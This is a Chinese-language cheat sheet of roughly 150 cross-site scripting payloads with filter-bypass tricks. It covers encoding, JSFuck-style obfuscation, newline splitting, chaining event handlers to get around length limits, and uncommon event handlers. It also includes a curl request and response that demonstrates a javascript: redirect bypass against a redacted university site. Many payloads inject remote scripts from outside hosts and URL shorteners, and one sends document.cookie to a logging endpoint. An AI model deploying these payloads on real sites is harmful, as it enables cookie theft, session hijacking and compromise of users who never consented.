XSS脚本收集

        
  1. < script > alert ( 0 )</ script >
  2. < script > confirm ( 1 )</ script >
  3. < script > prompt ( 2 )</ script >
  4. < script > \u 0061 \u 006C \u 0065 \u 0072 \u 0074 ( 3 )</ script >
  5. < script >[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</ script >
  6. < script > $ =~[]; $ ={ ___ :++ $ , $$$$ :(![]+ "" )[ $ ], __$ :++ $ , $_$_ :(![]+ "" )[ $ ], _$_ :++ $ , $_$$ :({}+ "" )[ $ ], $$_$ :( $ [ $ ]+ "" )[ $ ], _$$ :++ $ , $$$_ :(! "" + "" )[ $ ], $__ :++ $ , $_$ :++ $ , $$__ :({}+ "" )[ $ ], $$_ :++ $ , $$$ :++ $ , $___ :++ $ , $__$ :++ $ }; $ . $_ =( $ . $_ = $ + "" )[ $ . $_$ ]+( $ . _$ = $ . $_ [ $ . __$ ])+( $ . $$ =( $ . $ + "" )[ $ . __$ ])+((! $ )+ "" )[ $ . _$$ ]+( $ . __ = $ . $_ [ $ . $$_ ])+( $ . $ =(! "" + "" )[ $ . __$ ])+( $ . _ =(! "" + "" )[ $ . _$_ ])+ $ . $_ [ $ . $_$ ]+ $ . __ + $ . _$ + $ . $ ; $ . $$ = $ . $ +(! "" + "" )[ $ . _$$ ]+ $ . __ + $ . _ + $ . $ + $ . $$ ; $ . $ =( $ . ___ )[ $ . $_ ][ $ . $_ ]; $ . $ ( $ . $ ( $ . $$ + "\"" + $ . $_$_ +(![]+ "" )[ $ . _$_ ]+ $ . $$$_ + "\\" + $ . __$ + $ . $$_ + $ . _$_ + $ . __ + "(" + $ . $_$ + ")" + "\"" )())();</ script >
  7. < script >+ alert ( 6 )</ script >
  8. < script test > alert ( 7 )</ script >  
  9. < script > alert (/ 8 /)</ script >
  10. < script src = data : text / javascript , alert ( 9 )></ script >
  11. < script src = data : text / javascript , alert ( 10 )></ script >
  12. < script > alert ( String . fromCharCode ( 49 , 49 ))</ script >
  13. < script > alert (/ 12 /. source )</ script >
  14. < script > setTimeout ( alert ( 13 ), 0 )</ script >
  15. < script > document [ 'write' ]( 14 );</ script >
  16. < anytag onmouseover = alert ( 15 )> M
  17. < anytag onclick = alert ( 16 )> M
  18. < a onmouseover = alert ( 17 )> M
  19. < a onclick = alert ( 18 )> M
  20. < a href = javascript : alert ( 19 )> M
  21. < button / onclick = alert ( 20 )> M
  22. < form >< button formaction = javascript : alert ( 21 )> M
  23. < form / action = javascript : alert ( 22 )>< input / type = submit >
  24. < form onsubmit = alert ( 23 )>< button > M
  25. < img src = x onerror = alert ( 24 )>
  26. < img src = x onError = alert ( 24 )> 大写 bypass 某些过滤
  27. < body / onload = alert ( 25 )>
  28. < body onscroll = alert ( 26 )>< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< input autofocus >
  29. < iframe src = j
  30. a
  31. v
  32. a
  33. s
  34. c
  35. r
  36. i
  37. p
  38. t
  39. : a
  40. l
  41. e
  42. r
  43. t
  44. % 28
  45. 27
  46. % 29 ></ iframe >
  47. < iframe src = "http://0x.lv/xss.swf" ></ iframe >
  48. < iframe / onload = alert ( document . domain )></ iframe >
  49. < IFRAME SRC = "javascript:alert(29);" ></ IFRAME >
  50. < meta http - equiv = "refresh" content = "0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2F%73%63%72%69%70%74%3E" >
  51. < object data = data : text / html ; base64 , PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ +></ object >
  52. < object data = "javascript:alert(document.domain)" >
  53. < marquee  onstart = alert ( 30 )></ marquee >
  54. < isindex type = image src = 1 onerror = alert ( 31 )>
  55. < isindex action = javascript : alert ( 32 ) type = image >
  56. < input onfocus = alert ( 33 ) autofocus >
  57. < input onblur = alert ( 34 ) autofocus >< input autofocus >
  58. < INPUT TYPE = "IMAGE" SRC = x onerror = alert ( 35 )>
  59. < select onfocus = alert ( 36 ) autofocus >
  60. < textarea onfocus = alert ( 37 ) autofocus ></ textarea >
  61. < keygen onfocus = alert ( 38 ) autofocus >
  62. < FRAMESET >< FRAME SRC = "javascript:alert(document.domain);" ></ FRAMESET >
  63. < frameset onload = alert ( 40 )>
  64. < embed src = "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+" ></ embed >
  65. < embed src = javascript : alert ( document . domain )>
  66. < math href = "javascript:alert(45)" > M
  67. < math > < maction actiontype = "" xlink : href = "javascript:alert(46)" > M
  68. < math xlink : href = javascript : alert ( 47 )> M
  69. < img src = x onerror = "var s=document.createElement('script');s.src=" 这里填 js 地址 ";document.body.appendChild(s);" >
  70. domain = javascript : location . href = alert ( document . cookie )//
  71. < img src =# id = xssyou style = display : none onerror = eval ( unescape (/ var b = document . createElement ( "script" ); b . src = "http://xssnow.com/zuVV?" + Math . random ();( document . getElementsByTagName ( "HEAD" )[ 0 ]|| document . body ). appendChild ( b );/. source ));//>
  72. < img src =# id = xssyou style = display : none onerror = eval ( unescape (/ var b = document . createElement ( "script" ); b . src = "http://www.woshimaisaike.com/oWaKwi" ;( document . getElementsByTagName ( "HEAD" )[ 0 ]|| document . body ). appendChild ( b );/. source ));//>
  73. < img src =# id = xssyou style = display : none onerror = eval ( unescape (/ var % 20b % 3Ddocument . createElement % 28 % 22script % 22 % 29 % 3Bb . src % 3D % 22http % 3A % 2F % 2Fwww . woshimaisaike . com % 2FoWaKwi % 22 % 3B % 28document . getElementsByTagName % 28 % 22HEAD % 22 % 29 % 5B0 % 5D % 7C % 7Cdocument . body % 29.appendChild % 28b % 29 % 3B /. source ));//><//实际提交时需要使用这条,需要 url 编码>
  74. 伪协议: ed2k ://| file | test | '+alert(document.cookie)+' | test /
  75. [ url =< a id = "ed2k_T7V" href = "ed2k://|file|test|'+alert(document.cookie)+'|test/" target = "_blank" > 1 </ a >] 2 [/ url ]
  76. < svg / onload = document . body . appendChild ( createElement (/ script /. source )). src = String . fromCharCode ( 47 , 47 , 116 , 46 , 99 , 110 , 47 , 56 , 115 , 56 , 103 , 101 , 74 , 86 )
  77. < svg xmlns = "url" >< g onload = "javascript:alert(1)" ></ g ></ svg >
  78. 如果只允许()[]!+ $ ,那么可以使用 JSFCUK JSOTHER jjencode aaencode .
  79. < script > eval ( 'document.write("<\163cript/src=http://is.gd/grcGnF></\163cript>")' );</ script >
  80. < div style = "display:none" >< img title = "with(top.document)body.appendChild(createElement('script')).src='http://127.0.0.1/aol.php?mail=aol'" style = "&quot; onerror=eval(this.title) src=x" ></ div >
  81. < a href = "javasc
  82. ript:jQuery.getScript('//xss.**/****')" >点击查看详情</ a >//<在< script >和 javascript 等字符串中间会加上< x >,即变成< scr < x > ipt >和 java < x > script ,但是这里把 javascript 中间插入换行符(即 table 或者回车键)就可以绕过了><用 jQuery . getScript 执行外部 js >//需要具体环境
  83. < a href = "javasc
  84. ript:alert(/xss/)" >点击查看详情</ a ><
  85. 要换成 tabale 或者回车><注意: firefox 不可以, chrome 可以>
  86. < img width = 0 height = 0 onerror = " var NagvIw1 = window['document']['getElementsByTagName']('HEAD')['item'](0);var LVdmojAqt2 = window['document']['createElement']('script');LVdmojAqt2['type'] = 'text/javascript';LVdmojAqt2['src'] = '*****.js';NagvIw1['appendChild'](LVdmojAqt2);" src = "1" />
  87. < img src = x onerror = document . body . appendChild ( createElement (/ script /. source )). src = alt alt =// km3 . pw >
  88. < a href = javascript : alert ( document . cookie )>< img src = XXXX . png ></ a > < a >与< img >标签配合使用,会在< a >标签内插入一张图片,点击图片则触发< a >标签
  89. < img src = x onerror = d = document ; e = d . createElement ( 'script' ); e . src = 'http://127.0.0.1/eXploit.js' ; d . body . appendChild ( e );>
  90. < svg / onload = prompt ( 1 )>
  91. 未来所有的浏览器支持 ES6 ,所以可以使用下面两个 payload :< script > eval . call ` $ { 'prompt\x281)' }`</ script >,< script > eval . call ` $ { 'prompt\x281)' }`</ script >
  92. < input value = "" onresize = "prompt(1)" type = "text" >     // IE10 下有效     IE10 下,当页面第一次加载时,会调用 resize 事件
  93. < p class = "comment" title = "" onload = 'prompt(1)'"></p>
  94. <input value="" type=image src onerror=
  95. " prompt ( 1 ) " type=" text ">
  96. <img src=x onerror=x={png:1};(function(){alert(location.href)})(x //不能注释时使用闭合,构造后为:<img src=x onerror=x={png:1};(function(){alert(location.href)})(x).png>
  97. <img src=x top.onerror=alert(1)/>
  98. <img src=x onerror=top[" loc "+" ation "]='javascript:alert(1)'>
  99. <img src=x onerror=self[" loc "+" ation "]='javascript:alert(1)'>
  100. <img src=x onerror=parent[" loc "+" ation "]='javascript:alert(1)'>
  101. <img src=" x " onerror=" $ [ '\147\145\164S\143\162\151\160\164' ]( '\150\164\164\160\72\57\57\170\163\163\56\162\145\57\66\70\71\66' ) "><通过jquery>
  102. <img src=" x " onerror=" []. constructor . constructor ( 'aler\164(1)' )() ">
  103. <video src=http://www.baidu.com/img/bd_logo1.png onprogress=document.body.appendChild(document.createElement(/script/.source)).src=id id=//qqq.si/CVuD63>
  104. <img src=x onerror=eval('window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,46,114,101,47,55,48,52,50);document.body.appendChild(window.s)')>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
  105. <video  src=http://www.baidu.com/img/baidu_jgylogo3.gif onprogress=$['get\123cript']('http://w.s.js')>
  106. <img src=x
  107. onerror
  108. =alert(1)> 利用换行绕过
  109. javAScripT:eval(atob(/ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgc3JjPWh0dHA6Ly94NTUubWh6LnB3L0hZYkJ3VT48L3NjcmlwdD4nKTs/.source))    用//.source代替引号
  110. <!--[if true]><img onerror=alert(1) src=--><form
  111. action=javascript:alert(2)><input type=submit><input
  112. autofocus onfocus=alert(3)><select autofocus
  113. onfocus=alert(4)><textarea autofocus onfocus=alert(5)><HTML5特性>
  114. <span style=" background - color : expression ( alert ( 1 )); ">
  115. On/focus/=/" / alert /(/ docu / ment /. cook / ie /) 用/分隔关键字绕过
  116. < img width = "540" height = "258" style = "xxx:expressio/*\0*/n(if(!window.x){alert(document.domain);window.x=1;})" src = "http://www.baidu.com/img/bd_logo1.png" data_ue_src = "http://www.baidu.com/img/bd_logo1.png" >
  117. t <!--->< form >< button + formaction % 3djavascript % 3aalert ( 1 )+ autofocus +/> te
  118. t <!--->< form >< button formaction = javascript : alert ( 1 ) autofocus /> te
  119. < img src = 3D # style=3D"display:none" onerror=3Dalert(0)>  3D绕过
  120. < link rel = import href = http :// xxx / xxx . html > 36 chrome 最新支持
  121. < vmlframe xmlns = "urn:schemas-microsoft-com:vml" style = "behavior:url(#default#vml);position:absolute;width:100%;height:100%" src = "http://itsokla.duapp.com/shouzi.vml#xss" ></ vmlframe >
  122. < img src = x onerror = eval ( location . hash . slice ( 1 ))>
  123. < video src = '//dwz.cn/zNNYd' onsuspend = alert ( 1 )>
  124. < img / src = 'x' / onerror = alert ( 1 )//
  125. <!--[ if true ]>< img onerror = alert ( 1 ) src =-->< form action = javascript : alert ( 2 )>< input type = submit >< input autofocus onfocus = alert ( 3 )>< select autofocus onfocus = alert ( 4 )>< textarea autofocus onfocus = alert ( 5 )>
  126. < form id = "test" ></ form >< button form = "test" formaction = "javascript:alert(1)" > X </ button >         < form id = "test" ></ form >< button form = "test" formaction = "javas
  127. cript:alert(1)" > X </ button > html5 新增的实体命名编码:
  128. 换行实现绕过
  129. < img onreadystatechange = "alert(/xss/)" src = x >
  130. < img src = x onerror = alert (/ xss /)>
  131. < iframe src = "javascript:confirm(2)" ></ iframe >
  132. < iframe src = "javascript:alert(/xss/)" style = "display:none" ></ iframe >
  133. < a xlink : href = javascript : alert ( document . cookie )>
  134. < svg >< animateTransform attributeName = transform onbegin = alert ( 2 )>
  135. < fremeser onload = alert ( 1 )/>
  136. < marquee  onstart = alert ( 2 )></ marquee >
  137. < animateTransform attributeName = transform onbegin = alert ( 1 )>
  138. < meta http - equiv = "refresh" content = "0; url=data:text/html,%3Cscript%3Ealert%281%29%3C%2fscript%3E" >
  139. < meta http - equiv = "refresh" content = "0; url=data:text/html,%3Cscript%3Ewindow.open%28%27file%3A%2f%2fC%3A%2fwindows%2fsystem32%2fcmd.exe.%27%29%3C%2fscript%3E" >
  140. < a href = "java
  141. script:alert(document.cookie)" > xx </ a >
  142. < a href = "java
  143. script:alert(document.cookie)" > xx </ a >
  144. ? id =< svg / onload = $ . getScript ( '//website/xxx.js' )>
  145. ? id =< svg / onload = eval ( location . hash . substr ( 1 ))># YourJSCode
  146. < svg / onload = location . href = "//yourdomain.com/record.php?" + escape ( document . cookie )></ svg >
  147. < svg / onload = name = document . cookie . toString ()></ svg >
  148. < svg / onload = postMessage ( document . body . innerHTML , '*' );></ svg >
  149. < iframe src = "target.html?xsscode=<svg/onload=eval(name)></svg>" name = "document.write('xss payload')" />
  150. < svg / onload = document . write ( "\x3cscript/src=http://abcd.com/xss.js\x3e\x3c/script\x3e" )></ svg >
  151. < script / src =// 18.gy > // xss 短链接 20 字符
  152. < img src = 6 onerror = s1 = 'scri' ; s2 = 'pt' ; s = createElement ( s1 + s2 ); body . appendChild ( s ); s . src = 'http://t.cn/RUsPCEK' ;//////;-------->
  153. 绕过关键字 script 以及对>进行编码
  154. < svg >< use xlink : href = "data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" /></ svg >     保存为 1.htm 作为附件发送给对方,然后对方预览
  155. }</ style >< script > alert (/ xss /)</ DOC 文档字体中插入
  156. < svg >< animateTransform attributeName = transform dur = 1s onend = alert ( 1 )>
        
  1. Concat 绕过长度限制:
  2. < htmnl >
  3. < head ></ head >
  4. < body >
  5. < a onmouseover = "a='http:'" > a9 </ a >
  6. < a onmouseover = "s=String.fromCharCode" > a10 </ a >
  7. < a onmouseover = "a=a.concat(s(47))" > a11 </ a >//用 String . fromCharCode 47 转换成字符/,然后用 concat 拼接到 a
  8. < a onmouseover = "a=a.concat(s(47))" > a12 </ a >
  9. < a onmouseover = "a=a.concat('is.gd')" > a13 </ a >
  10. < a onmouseover = "a=a.concat(s(47))" > a14 </ a >
  11. < a onmouseover = "a=a.concat('lFYAxW')" > a15 </ a >
  12. < a onmouseover = "r='script'" > a2 </ a >
  13. < a onmouseover = "d=document" > a3 </ a >
  14. < a onmouseover = "n=d.createElement(r)" > a4 </ a >
  15. < a onmouseover = "n.src=a" > a5 </ a >
  16. < a onmouseover = "h=d.body" > a6 </ a >
  17. < a onmouseover = "h.appendChild(n)" > a7 </ a >
  18. </ body >
  19. </ html >
          
  1. +号拼接绕过长度限制
  2. < htmnl >
  3. < head ></ head >
  4. < body >
  5. < a onmouseover = "a='http:'" > a9 </ a >
  6. < a onmouseover = "a=a+'//is.gd'" > a9 </ a >
  7. < a onmouseover = "a=a+'/lFYAxW'" > a9 </ a >
  8. < a onmouseover = "r='script'" > a2 </ a >
  9. < a onmouseover = "d=document" > a3 </ a >
  10. < a onmouseover = "n=d.createElement(r)" > a4 </ a >
  11. < a onmouseover = "n.src=a" > a5 </ a >
  12. < a onmouseover = "h=d.body" > a6 </ a >
  13. < a onmouseover = "h.appendChild(n)" > a7 </ a >
  14. </ body >
  15. </ html >
FLASHxss
          
  1. < embed src = "http://cm2.in/xss.swf" allownetworking = "all"
  2. allowscriptaccess = "always" >
不常见的on事件,可能可以绕过过滤,
          
  1. fscommand
  2. onbegin
  3. ondragdrop
  4. onend
  5. onhashchange
  6. oninput
  7. onmediacomplete
  8. onmediaerror
  9. onmessage
  10. onoffline
  11. onoutofsync
  12. onpause
  13. onpopstate
  14. onprogress
  15. onredo
  16. onrepeat
  17. onresume
  18. onreverse
  19. onrowsenter
  20. onrowdelete
  21. onrowinserted
  22. onseek
  23. onstorage
  24. onsyncrestored
  25. ontimeerror
  26. ontrackchange
  27. onundo
  28. onurlflip
  29. seeksegmenttime
        
  1. $ curl - v "http://****.edu.cn/go.asp?url=javascript\u003aeval(location.hash.slice(1))#alert(document.cookie);"
  2. *   Trying 127.0 . 0.1 ...
  3. * Connected to 127.0 . 0.1 ( 127.0 . 0.1 ) port 1080 (# 0 )
  4. > GET http ://****. edu . cn / go . asp ? url = javascript\u 003aeval ( location . hash . slice ( 1 )) HTTP / 1.1
  5. > User - Agent : curl / 7.41 . 0
  6. > Host : ****. edu . cn
  7. > Accept : */*
  8. > Proxy - Connection : Keep - Alive
  9. >
  10. < HTTP / 1.1 200 OK
  11. < Connection : close
  12. < Date : Mon , 27 Jun 2016 06 : 13 : 31 GMT
  13. < Server : Microsoft - IIS / 6.0
  14. < X - Powered - By : ASP . NET
  15. < Content - Length : 113
  16. < Content - Type : text / html
  17. < Set - Cookie : ASPSESSIONIDCCTTQQQQ = KLNDIOEAOHCIMEMFJMOOMCHN ; path =/
  18. < Cache - control : private
  19. < Proxy - Connection : keep - alive
  20. <
  21. < script language = "javascript" >
  22. window . location . href = "javascript\u003aeval(location.hash.slice(1))" ;
  23. </ script >* Closing connection 0

  24. 限制信息:url字符串长度不能超过100,而且会检查一些关键字,比如url=javascript:alert(1);会被拦截,但可以用JS编码绕过。